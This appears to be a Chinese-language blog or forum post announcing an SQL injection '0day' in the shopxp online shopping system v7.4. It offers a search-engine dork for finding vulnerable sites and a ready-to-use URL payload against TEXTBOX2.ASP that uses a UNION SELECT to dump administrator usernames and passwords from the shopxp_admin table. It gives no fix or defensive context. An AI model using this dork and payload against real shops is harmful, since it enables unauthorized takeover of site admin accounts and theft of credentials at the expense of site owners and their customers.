« 上一篇下一篇 »

shopxp v7.4 SQL注入0day


 


漏洞版本:shopxp网上购物系统 v7.4
关键词:inurl:shopxp_news.asp
shopxp_news.asp
暴密码的语句:
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin